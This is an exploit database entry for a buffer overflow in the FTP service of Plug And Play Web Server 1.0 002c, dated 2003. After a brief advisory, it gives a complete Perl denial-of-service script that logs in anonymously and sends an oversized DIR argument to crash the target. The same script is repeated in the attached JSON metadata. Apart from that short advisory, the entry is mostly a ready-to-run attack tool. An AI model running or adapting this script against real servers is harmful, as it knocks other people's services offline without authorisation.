Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow
2003-09-21T00:00:00
ID EXPLOITPACK:EFF56CF3C1ECB16EAB25CE36B21EEF89 Type exploitpack Reporter Bahaa Naamneh Modified 2003-09-21T00:00:00
Description
Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow
source: https://www.securityfocus.com/bid/8667/info
Plug and Play Web Server FTP service has been reported prone to multiple buffer overflow issues, the issues present themselves when the affected FTP service handles FTP command arguments of excessive size.
It has been demonstrated that a remote attacker may exploit this condition to trigger a denial of service in the affected FTP server. However, due to the nature of this vulnerability, although unconfirmed, it has been conjectured that a remote attacker may leverage this vulnerability to have arbitrary code executed in the context of the vulnerable service.
#!/usr/bin/perl
# ppftpdos.pl - Remote denial of service against Plug & Play FTP server
use Net::FTP;
$host = $ARGV[0];
$buffer = "A"x540;
if("$ARGV[0]" eq "") {
print("DOS against Plug & Play FTP Server by Bahaa Naamneh\n");
print("b_naamneh@hotmail.com - http://www.bsecurity.tk\n");
print("====================================================\n");
die("Usage : ./PPftpdos <host\/ip>\n");
} else {
print("Connecting to $host...\n");
my $ftp = Net::FTP->new($host) or die "Couldn't connect to
$host\n";
print("Connected!\n");
$username = "anonymous";
$password = "anonymous";
$ftp->login($username, $password)
or die "Could not log in.\n";
$ftp->dir($buffer);
$ftp->quit();
print("Success!\n");
}
{"lastseen": "2020-04-01T19:04:43", "references": [], "description": "\nPlug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow", "edition": 1, "reporter": "Bahaa Naamneh", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2003-09-21T00:00:00", "title": "Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2003-09-21T00:00:00", "id": "EXPLOITPACK:EFF56CF3C1ECB16EAB25CE36B21EEF89", "href": "", "viewCount": 2, "sourceData": "source: https://www.securityfocus.com/bid/8667/info\n\nPlug and Play Web Server FTP service has been reported prone to multiple buffer overflow issues, the issues present themselves when the affected FTP service handles FTP command arguments of excessive size.\n\nIt has been demonstrated that a remote attacker may exploit this condition to trigger a denial of service in the affected FTP server. However, due to the nature of this vulnerability, although unconfirmed, it has been conjectured that a remote attacker may leverage this vulnerability to have arbitrary code executed in the context of the vulnerable service. \n\n#!/usr/bin/perl\n# ppftpdos.pl - Remote denial of service against Plug & Play FTP server\n\nuse Net::FTP;\n\n$host = $ARGV[0];\n\n$buffer = \"A\"x540;\n\nif(\"$ARGV[0]\" eq \"\") {\n print(\"DOS against Plug & Play FTP Server by Bahaa Naamneh\\n\");\n print(\"b_naamneh@hotmail.com - http://www.bsecurity.tk\\n\");\n print(\"====================================================\\n\");\n die(\"Usage : ./PPftpdos <host\\/ip>\\n\");\n} else {\n\n print(\"Connecting to $host...\\n\");\n my $ftp = Net::FTP->new($host) or die \"Couldn't connect to\n$host\\n\";\n print(\"Connected!\\n\");\n\n $username = \"anonymous\";\n $password = \"anonymous\";\n\n $ftp->login($username, $password)\n or die \"Could not log in.\\n\";\n\n $ftp->dir($buffer);\n\n $ftp->quit();\n\n print(\"Success!\\n\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645530001}}